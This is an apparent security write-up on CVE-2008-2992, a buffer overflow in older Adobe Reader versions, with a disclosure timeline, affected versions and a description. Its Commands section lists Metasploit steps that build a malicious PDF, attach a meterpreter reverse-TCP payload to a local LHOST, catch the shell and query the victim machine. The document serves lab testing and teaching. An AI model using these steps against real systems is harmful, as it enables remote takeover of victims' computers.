Timeline :

Vulnerability reported by Peter Vreugdenhil to ZDI
Vulnerability reported from ZDI to the vendor the 2008-01-21
Coordinated public release the 2008-11-04
Milw0rm PoC provided by Debasis Mohanty the 2008-11-05
Metasploit PoC provided by Mario Ceballos the 2008-12-03

    PoC provided by :

MC
Didier Stevens

    Reference(s) :

CVE-2008-2992

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional prior to 8.1.3

    Tested on Windows XP SP3 with :

    Adobe Reader 8.1.2

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional prior to 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf entry, an attacker may be able to execute arbitrary code

    Commands :

use exploit/windows/fileformat/adobe_utilpri­ntf
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig